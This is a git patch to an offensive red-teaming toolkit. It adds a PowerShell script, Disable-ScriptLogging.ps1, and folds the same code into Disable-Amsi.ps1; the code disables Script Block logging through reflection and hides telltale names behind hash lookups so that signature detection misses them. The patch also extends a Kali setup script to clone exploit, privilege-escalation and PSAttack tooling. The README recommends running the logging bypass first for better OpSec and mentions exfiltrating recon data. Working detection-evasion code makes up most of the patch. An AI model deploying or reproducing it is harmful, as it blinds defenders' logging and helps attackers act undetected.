From afaac0b552460adba31eaad9e0d9478f098d3163 Mon Sep 17 00:00:00 2001 From: mb Date: Wed, 19 Jun 2019 15:48:24 +0200 Subject: [PATCH] Added Script Block logging bypass: --- linux/prepare-kali.sh | 17 ++- red-teaming/Disable-Amsi.ps1 | 60 ++++++++-- red-teaming/Disable-ScriptLogging.ps1 | 151 ++++++++++++++++++++++++++ red-teaming/README.md | 4 + 4 files changed, 220 insertions(+), 12 deletions(-) create mode 100644 red-teaming/Disable-ScriptLogging.ps1 diff --git a/linux/prepare-kali.sh b/linux/prepare-kali.sh index 7287a8b..8f64787 100644 --- a/linux/prepare-kali.sh +++ b/linux/prepare-kali.sh @@ -72,7 +72,7 @@ wget https://gist.githubusercontent.com/mgeeky/8b7b1c8d9fe8be69978d774bddb6e382/ cd $ROOT_DIR/tools -mkdir {bruteforce,clouds,devops,deserialization,exploitdev,windows,redteam,recon,reversing,web,infra,fuzzers,linux,misc,ssl,sourceaudit,shells,wireless} +mkdir {bruteforce,clouds,devops,deserialization,exploitdev,windows,redteam,recon,reversing,web,infra,fuzzers,linux,misc,privesc,ssl,sourceaudit,shells,wireless} git_clone https://github.com/mgeeky/Penetration-Testing-Tools @@ -203,6 +203,10 @@ git_clone https://github.com/wireghoul/graudit.git git_clone https://github.com/netbiosX/Checklists.git popd +pushd privesc +git_clone https://github.com/AusJock/Privilege-Escalation.git +popd + pushd recon git_clone https://github.com/FortyNorthSecurity/EyeWitness.git git_clone https://github.com/OWASP/Amass.git @@ -233,6 +237,11 @@ git_clone https://github.com/dxa4481/truffleHog.git popd pushd redteam +git_clone https://github.com/jaredhaight/PSAttack.git +cd PSAttack +wget https://github.com/jaredhaight/PSAttack/releases/download/v1.99.1/PSAttack-1.99.1.zip +unzip -d . PSAttack-1.99.1.zip +cd .. git_clone https://github.com/danielbohannon/Invoke-Obfuscation.git git_clone https://github.com/FuzzySecurity/PowerShell-Suite.git git_clone https://github.com/rvrsh3ll/Misc-Powershell-Scripts.git @@ -410,9 +419,11 @@ popd pushd windows git_clone https://github.com/M4ximuss/Powerless.git -git_clone https://github.com/SecWiki/windows-kernel-exploit.git +git_clone https://github.com/SecWiki/windows-kernel-exploits.git git_clone https://github.com/smgorelik/Windows-RCE-exploits.git +git_clone https://github.com/abatchy17/WindowsExploits.git git_clone https://github.com/GDSSecurity/Windows-Exploit-Suggester.git +git_clone https://github.com/brianwrf/WinSystemHelper.git git_clone https://github.com/pentestmonkey/windows-privesc-check.git git_clone https://github.com/rootm0s/WinPwnage.git cd WinPwnage @@ -424,7 +435,7 @@ popd pushd wireless git_clone https://github.com/brav0hax/easy-creds.git -git_clone https://github.com/s0lst1c3/eaphammer.git ; cd eaphammer ; ./kali-setup ; cd .. +git_clone https://github.com/s0lst1c3/eaphammer.git ; cd eaphammer ; yes | ./kali-setup ; cd .. git_clone https://github.com/derv82/wifite2.git ; cd wifite2 ; python setup.py install ; cd .. popd diff --git a/red-teaming/Disable-Amsi.ps1 b/red-teaming/Disable-Amsi.ps1 index a3805f6..153b987 100644 --- a/red-teaming/Disable-Amsi.ps1 +++ b/red-teaming/Disable-Amsi.ps1 @@ -723,20 +723,62 @@ function Disable-Amsi return $false } - function BlockLoggingBypass - { - try + function Disable-ScriptLogging + { + function ScriptLogging-Technique1 { $asm = [AppDomain]::CurrentDomain.GetAssemblies() | ? {$_.Location -and ((Get-Hash($_.Location.Split('\')[-1])) -eq 65764965518)} $mytype = $asm.GetTypes() | ? {(Get-Hash($_.Name)) -eq 12579468197} $foo = $mytype.GetFields([System.Reflection.BindingFlags]40) | ? {(Get-Hash($_.Name)) -eq 12250760746} - $foo.SetValue($null, (New-Object 'System.Collections.Generic.HashSet[string]')) - return $true + $out = $foo.GetValue($null) + $k0 = "" + foreach ($item in $out){ + if((Get-Hash($item)) -eq 32086076268) { # ScrXiptBloXckLogXging + $k0 = $item + break + } + } + #$foo.SetValue($null,(New-Object Collections.Generic.HashSet[string])) + Write-Host "[+] Finished applying technique 1" + return $k0 } - Catch + + function ScriptLogging-Technique2($k0) { - return $false + $asm = [AppDomain]::CurrentDomain.GetAssemblies() | ? {$_.Location -and ((Get-Hash($_.Location.Split('\')[-1])) -eq 65764965518)} # SysXtem.ManaXgement.AutomaXtion.dll + $mytype = $asm.GetTypes() | ? {(Get-Hash($_.Name)) -eq 4572158998} # UXtils + $foo = $mytype.GetFields([System.Reflection.BindingFlags]40) | ? {(Get-Hash($_.Name)) -eq 52485150955} # caXchedGrXoupPoXlicySettXings + if(-not $foo -or $foo -eq $null) { + $foo = $mytype.GetFields([System.Reflection.BindingFlags]40) | ? {(Get-Hash($_.Name)) -eq 56006640029} # s_caXchedGrXoupPoXlicySettXings + } + + if($foo) { + $cache = $foo.GetValue($null) + $k1 = $cache.Keys | ? {(Get-Hash($_.Split('\\')[-1])) -eq 32086076268} # ScrXiptBloXckLogXging + if($k1 -and $cache[$k1]) { + $k2 = $cache[$k1].Keys | ? {(Get-Hash($_)) -eq 45083803091} # EnabXleScrXiptBloXckLogXging + $k3 = $cache[$k1].Keys | ? {(Get-Hash($_)) -eq 70211596397} # EnabXleScrXiptBloXckInvocXationLogXging + if($k2 -and $cache[$k1][$k2]) { + $cache[$k1][$k2] = 0 + } + if($k3 -and $cache[$k1][$k3]) { + $cache[$k1][$k3] = 0 + } + } + + $vl = [System.Collections.Generic.Dictionary[string,System.Object]]::new() + $vl.Add('Enabl'+'e'+$k0, 0) + $k01 = $k0 -replace 'kL', 'kInvocationL' + $vl.Add('Ena'+'ble'+$k01, 0) + $cache['HKEY_LOCAL_M'+'ACHINE\Software\Policie'+'s\Microsoft\Wind'+'ows\PowerSh'+'ell\'+$k0] = $vl + } + + Write-Host "[+] Finished applying technique 2" } + + $out = ScriptLogging-Technique1 + ScriptLogging-Technique2 $out + return $true } function Check-IsAdmin { @@ -760,11 +802,11 @@ function Disable-Amsi } if ($DontDisableBlockLogging -eq $false) { - if (BlockLoggingBypass) { + if (Disable-ScriptLogging) { Write-Host "[+] Disabled Script Block logging." } else { - Write-Host "[-] Could not disblae Script Block logging." + Write-Host "[-] Could not disable Script Block logging." } } diff --git a/red-teaming/Disable-ScriptLogging.ps1 b/red-teaming/Disable-ScriptLogging.ps1 new file mode 100644 index 0000000..c677ccb --- /dev/null +++ b/red-teaming/Disable-ScriptLogging.ps1 @@ -0,0 +1,151 @@ +#requires -version 5 + +<# +.SYNOPSIS + +Attempts to disable Script Block logging within current process using well-known techniques laid out in an unsignatured way. + +Author: Mariusz B. (@mgeeky) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + +.DESCRIPTION + +Tries to evade Script Block logging by leveraging couple of publicly documented techniqus, but in +an approach to avoid signatured or otherwise considered harmful keywords. + +Notice: These techniques only disable Script Block logging within current process context. Tricks implemented +are not system-wide and not permament. + +Using a hash-lookup approach when determining prohibited symbol names, we are able +to avoid relying on blacklisted values and having them hardcoded within the script. +This implementation iterates over all of the assemblies, their exposed types, methods and +fields in order to find those that are required but by their computed hash-value rather than +direct name. Since hash-value computation algorithm was open-sources and is simple to +manipulate, the attacker becomes able to customize hash-lookup scheme the way he likes. + +A simplest approach to alter return values coming out of Get-Hash would be to change the +initial value of $val variable. + +The script comes up with several techniques implemented. Triggers them one by one. Should one +return successfully, the script is going to finish it's execution. + +The approaches implemented in this script heavily rely on the previous work of: + +- Ryan Cobb: https://cobbr.io/ScripXXXtBlock-Logging-BypXXXass.html +- Ryan Cobb: https://cobbr.io/ScriptXXXBlock-Warning-Event-Logging-BypXXXass.html + +.EXAMPLES + +PS> Disable-ScriptLogging + +#> + +function Disable-ScriptLogging +{ + function bitshift + { + param( + [Parameter(Mandatory,Position=0)] + [long]$x, + + [Parameter(ParameterSetName='Left')] + [ValidateRange(0,[int]::MaxValue)] + [int]$Left, + + [Parameter(ParameterSetName='Right')] + [ValidateRange(0,[int]::MaxValue)] + [int]$Right + ) + + $shift = if($PSCmdlet.ParameterSetName -eq 'Left') + { + $Left + } + else + { + -$Right + } + + $ret = [math]::Floor($x * [math]::Pow(2,$shift)) + return [System.Convert]::TOUInt32($ret -band ([uint32]::MaxValue)) + } + + function Get-Hash + { + param( + [Parameter(Mandatory = $true)] + [AllowEmptyString()] + [string]$name + ) + if ($name.Length -eq 0) + { + return 0 + } + + $name = $name.ToLower(); + $val = 5381 + for($i = 0; $i -lt $name.Length; $i++) + { + $n = bitshift $val -left 5 + $val = ($n + $val) + [byte][char]$name[$i] + } + + return $val + } + + function ScriptLogging-Technique1 + { + $asm = [AppDomain]::CurrentDomain.GetAssemblies() | ? {$_.Location -and ((Get-Hash($_.Location.Split('\')[-1])) -eq 65764965518)} + $mytype = $asm.GetTypes() | ? {(Get-Hash($_.Name)) -eq 12579468197} + $foo = $mytype.GetFields([System.Reflection.BindingFlags]40) | ? {(Get-Hash($_.Name)) -eq 12250760746} + $out = $foo.GetValue($null) + $k0 = "" + foreach ($item in $out){ + if((Get-Hash($item)) -eq 32086076268) { # ScrXiptBloXckLogXging + $k0 = $item + break + } + } + #$foo.SetValue($null,(New-Object Collections.Generic.HashSet[string])) + Write-Host "[+] Finished applying technique 1" + return $k0 + } + + function ScriptLogging-Technique2($k0) + { + $asm = [AppDomain]::CurrentDomain.GetAssemblies() | ? {$_.Location -and ((Get-Hash($_.Location.Split('\')[-1])) -eq 65764965518)} # SysXtem.ManaXgement.AutomaXtion.dll + $mytype = $asm.GetTypes() | ? {(Get-Hash($_.Name)) -eq 4572158998} # UXtils + $foo = $mytype.GetFields([System.Reflection.BindingFlags]40) | ? {(Get-Hash($_.Name)) -eq 52485150955} # caXchedGrXoupPoXlicySettXings + if(-not $foo -or $foo -eq $null) { + $foo = $mytype.GetFields([System.Reflection.BindingFlags]40) | ? {(Get-Hash($_.Name)) -eq 56006640029} # s_caXchedGrXoupPoXlicySettXings + } + + if($foo) { + $cache = $foo.GetValue($null) + $k1 = $cache.Keys | ? {(Get-Hash($_.Split('\\')[-1])) -eq 32086076268} # ScrXiptBloXckLogXging + if($k1 -and $cache[$k1]) { + $k2 = $cache[$k1].Keys | ? {(Get-Hash($_)) -eq 45083803091} # EnabXleScrXiptBloXckLogXging + $k3 = $cache[$k1].Keys | ? {(Get-Hash($_)) -eq 70211596397} # EnabXleScrXiptBloXckInvocXationLogXging + if($k2 -and $cache[$k1][$k2]) { + $cache[$k1][$k2] = 0 + } + if($k3 -and $cache[$k1][$k3]) { + $cache[$k1][$k3] = 0 + } + } + + $vl = [System.Collections.Generic.Dictionary[string,System.Object]]::new() + $vl.Add('Enabl'+'e'+$k0, 0) + $k01 = $k0 -replace 'kL', 'kInvocationL' + $vl.Add('Ena'+'ble'+$k01, 0) + $cache['HKEY_LOCAL_M'+'ACHINE\Software\Policie'+'s\Microsoft\Wind'+'ows\PowerSh'+'ell\'+$k0] = $vl + } + + Write-Host "[+] Finished applying technique 2" + } + + $out = ScriptLogging-Technique1 + ScriptLogging-Technique2 $out +} \ No newline at end of file diff --git a/red-teaming/README.md b/red-teaming/README.md index c80fc13..2b10328 100644 --- a/red-teaming/README.md +++ b/red-teaming/README.md @@ -39,6 +39,10 @@ PS > "amsiInitFailed" amsiInitFailed ``` +- **`Disable-ScriptLogging.ps1`** - Tries to evade Script Block logging by leveraging couple of publicly documented techniqus, but in an approach to avoid signatured or otherwise considered harmful keywords. + +*Warning:* This scriptlet should be launched first, before `Disable-Amsi.ps1` for better OpSec experience. + - **`Export-ReconData.ps1`** - Powershell script leveraging [PowerSploit Recon](https://github.com/PowerShellMafia/PowerSploit) module (PowerView) to save output from Reconnaissance cmdlets like `Get-*`, `Find-*` into _Clixml_ files. Those files (stored in an output directory as separate XML files) can later be extracted from attacked environment and loaded to a new powershell runspace using the same script. Very useful when we want to obtain as many data as possible, then exfiltrate that data, review it in our safe place and then get back to attacked domain for lateral spread. **Warning**: Be careful though, as this script launches many reconnaissance commands one by one, this WILL generate a lot of noise. Microsoft ATA for instance for sure pick you up with _"Reconnaissance using SMB session enumeration"_ after you've launched `Invoke-UserHunter`.